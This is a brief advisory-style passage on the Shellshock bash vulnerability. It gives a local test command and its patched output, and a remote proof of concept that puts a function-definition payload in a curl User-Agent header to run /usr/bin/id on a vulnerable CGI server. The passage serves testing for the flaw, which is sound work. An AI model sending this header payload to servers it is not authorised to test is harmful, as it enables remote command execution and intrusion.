Proof of Concept - at local system
A simple test to check if your Bash is vulnerable is available publicly.
$ env var='() { :;}; echo vulnerable' bash -c /bin/trueUpon running the above command, an affected version of bash will output "vulnerable". Once the patch has been applied, the same test will return the following result.
bash: warning: var: ignoring function definition attempt bash: error importing function definition for 'var'
Proof of Concept - to a remote server.
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id"A vulnerable web CGI will return uid=48(apache) gid=48(apache) groups=48(apache), and follow by HTML page. A non-vulnerable should return just the HTML page.